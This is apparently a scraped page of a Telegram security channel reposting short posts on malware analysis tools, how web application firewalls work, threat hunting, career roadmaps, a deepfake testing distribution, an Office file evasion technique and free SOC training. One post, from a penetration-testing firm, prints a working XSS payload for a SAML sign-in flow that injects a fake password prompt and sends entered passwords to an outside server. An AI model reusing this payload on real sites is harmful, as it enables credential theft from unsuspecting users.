UNDERCODE TESTING
312 subscribers
311 photos
24 videos
173 files
29.7K links
๐Ÿฆ‘ World first platform which Collect & Analyzes every New hacking method.

+ Free AI Practice.

(New Bug Bounty Methods, Tools Updates, AI & Courses).

โœจ Services: Undercode.help/services

โœจyoutube.com/undercode

@Undercode_Testing
Download Telegram
Forwarded from Exploiting Crew (Pr1vAt3)
๐Ÿฆ‘Top Malware Analysis Tools:

Ref: Harun Seker, CISSP
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘New (free) Course Launch- from the Open University Cisco ASC - focussing on UK Legislation for Digital and Cyber - it is currently a beta, however all educators and students may use this resource
Forwarded from Exploiting Crew (Pr1vAt3)
๐Ÿฆ‘๐‡๐จ๐ฐ ๐ƒ๐จ๐ž๐ฌ ๐š ๐–๐€๐… ๐ฐ๐จ๐ซ๐ค?
A Web Application Firewall (WAF) functions by monitoring and filtering HTTP/HTTPS traffic to and from web applications.

๐Š๐ž๐ฒ ๐จ๐ฉ๐ž๐ซ๐š๐ญ๐ข๐จ๐ง๐š๐ฅ ๐œ๐จ๐ฆ๐ฉ๐จ๐ง๐ž๐ง๐ญ๐ฌ ๐ข๐ง๐œ๐ฅ๐ฎ๐๐ž: -

๐“๐ซ๐š๐Ÿ๐Ÿ๐ข๐œ ๐€๐ง๐š๐ฅ๐ฒ๐ฌ๐ข๐ฌ: It scrutinizes incoming and outgoing requests to pinpoint anomalies or potential threats.

๐‘๐ฎ๐ฅ๐ž ๐„๐ง๐Ÿ๐จ๐ซ๐œ๐ž๐ฆ๐ž๐ง๐ญ: Predefined rulesets are applied to identify and mitigate malicious activity. Analytical techniques employed by a WAF encompass:

๐๐ฅ๐š๐œ๐ค๐ฅ๐ข๐ฌ๐ญ๐ข๐ง๐ : This approach blocks requests from known malicious IP addresses, preventing unauthorized access.

๐–๐ก๐ข๐ญ๐ž๐ฅ๐ข๐ฌ๐ญ๐ข๐ง๐ : Only explicitly approved requests are allowed through, enhancing security by default.

๐’๐ข๐ ๐ง๐š๐ญ๐ฎ๐ซ๐ž-๐๐š๐ฌ๐ž๐ ๐ƒ๐ž๐ญ๐ž๐œ๐ญ๐ข๐จ๐ง**This method involves recognizing established attack patterns based on known signatures.

**๐๐ž๐ก๐š๐ฏ๐ข๐จ๐ซ๐š๐ฅ ๐€๐ง๐š๐ฅ๐ฒ๐ฌ๐ข๐ฌ
: Leveraging machine learning algorithms, the WAF can identify suspicious behaviors that may deviate from normal activity. Unlike traditional antivirus solutions that rely solely on signature detection,
WAFs utilize more sophisticated detection mechanisms.

๐Ž๐ง๐œ๐ž ๐ญ๐ก๐ซ๐ž๐š๐ญ๐ฌ ๐š๐ซ๐ž ๐๐ž๐ญ๐ž๐œ๐ญ๐ž๐, ๐ญ๐ก๐ž ๐–๐€๐… ๐ข๐ฆ๐ฉ๐ฅ๐ž๐ฆ๐ž๐ง๐ญ๐ฌ ๐ญ๐ก๐ž ๐Ÿ๐จ๐ฅ๐ฅ๐จ๐ฐ๐ข๐ง๐  ๐ฆ๐ž๐š๐ฌ๐ฎ๐ซ๐ž๐ฌ:

๐‘๐ž๐ช๐ฎ๐ž๐ฌ๐ญ ๐๐ฅ๐จ๐œ๐ค๐ข๐ง๐ : Directly halting any identified malicious requests.

๐„๐ฏ๐ž๐ง๐ญ ๐‹๐จ๐ ๐ ๐ข๐ง๐ : Recording incidents for further investigation and analysis, facilitating continued improvement of security postures.

Image credit: Cyber Edition
Ref: Praveen Singh

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘ Free New Threat Hunting Resources Added! ๐Ÿšจ

๐Ÿ” What's New?

1๏ธโƒฃ Advanced Threat Hunting Queries (hashtag#KQL):
- Identify and monitor vulnerable assets for Known Exploited Vulnerabilities (hashtag#KEVs) by ransomware groups.
- Attack Vector: Network | Privileges Required: None

> Download <

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from Exploiting Crew (Pr1vAt3)
๐Ÿฆ‘๐‚๐ฒ๐›๐ž๐ซ ๐’๐ž๐œ๐ฎ๐ซ๐ข๐ญ๐ฒ ๐œ๐š๐ซ๐ž๐ž๐ซ๐ฌ ๐๐š๐ญ๐ก.

1) Security certification roadmap https://lnkd.in/ghvqfZ3z & https://lnkd.in/eFU8WC29

2) Domains of cyber security https://lnkd.in/eXsfxkTs

3) Cyber career map https://lnkd.in/evTUCgas

4) Cyber career map https://dsci.in

Suggestion on how to use these: ask yourself
๐Ÿ‘‰ What domain of security interests you (offensive? Policy? Defence?),
๐Ÿ‘‰ What job you want (pentester? CISO?),
๐Ÿ‘‰ What certifications you might need (OSCP? CEH?)
๐Ÿ‘‰ What level they are at, build up a plan of how to get there?
Thank you Katie Paxton-Fear for nice sharing.

Ref: G M Faruk Ahmed, CISSP, CISA

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from UNDERCODER
๐Ÿฆ‘DeepfakeOSโ„ข, the first-of-its-kind Linux-based toolkit designed exclusively for ethical deepfake penetration testing and advancing cognitive security.

DeepfakeOSโ„ข is a cutting-edge Linux operating system preloaded with open-source tools for ethically creating synthetic media, including video, audio, and text. As synthetic media becomes more advanced, so do the threats it poses. DeepfakeOSโ„ข empowers security professionals and researchers to understand, test, and defend against these emerging threats by providing a comprehensive, preloaded toolkit for ethical purposes.


https://deepfakedashboard.com/deepfakeos

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿฆ‘New evasion technique that is bypassing almost all security solutions so far, taking advantage of the recovery functionality in applications. This is groundbreaking as most if not all endpoint solutions arenโ€™t armed with any file recovery techniques and would fail to detect this attack vector.

>> Microsoft has structured word documents similar to archives, constructing any doc file with 3 sections; starting with local file headers, central file headers and end directory records. These 3 sections are linked backward starting from the end to the header.

>> Manipulating any of these sections makes it harder for any endpoint or email security solution to unpack and identify the issue, but recoverable by its intending application after its too late.

Ref: Chadi S.

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from Exploiting Crew (Pr1vAt3)
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿฆ‘How run the Password Reset Flaw | Live PoC - New method

Ref: Rohith S.
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Media is too big
VIEW IN TELEGRAM
๐Ÿฆ‘ The Official NASA CSRF Vulnerability Video
Forwarded from Exploiting Crew (Pr1vAt3)
Forwarded from Exploiting Crew (Pr1vAt3)
๐Ÿฆ‘ Leveling Up Our XSS Proof of Concepts at CybaVerse :

It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).

We recently encountered an XSS vulnerability within a SAML Sign-in flow โ€” not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
๐Ÿ”น Manipulate the HTML to display a fake login prompt.
๐Ÿ”น Capture user-entered passwords and send them to our server.

Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the applicationโ€™s defences, this vulnerability still allowed us to:
๐Ÿ”น Phish user credentials via a convincing fake prompt.
๐Ÿ”น Demonstrate impact beyond simple alert pop-ups or redirects.

Hereโ€™s a snippet of the payload I crafted:

โš ๏ธ <samlp:StatusCode Value="XSS POC&#39;;document.body.innerHTML=&#39;&lt;br&gt;&lt;h1&gt;Authentication failed, re-enter your password&lt;/h1&gt;&lt;br&gt;&lt;form action=&quot;//https://lnkd.in/ecG5926A&quot; method=&quot;post&quot;&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot;&gt;&lt;br&gt;&lt;button type=&quot;submit&quot;&gt;Submit&lt;/button&gt;&lt;/form&gt;&#39;+document.body.innerHTML;&"/> โš ๏ธ

The image below shows the entered password if someone fell for the prompt: โ€œAuthentication failed, re-enter your password.โ€

Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.

Ref: Michael Jepson
@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from Exploiting Crew (Pr1vAt3)
๐Ÿฆ‘FREE ๐’๐Ž๐‚ ๐ญ๐ซ๐š๐ข๐ง๐ข๐ง๐ ๐ฌ:

โœ…Microsoft Security Operations Analyst:
https://lnkd.in/eKTXEmna

โœ…TryHackMe
SOC level 1: https://lnkd.in/enkunj-B
SOC level 2: https://lnkd.in/eg4znfJr

@UndercodeCommunity
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–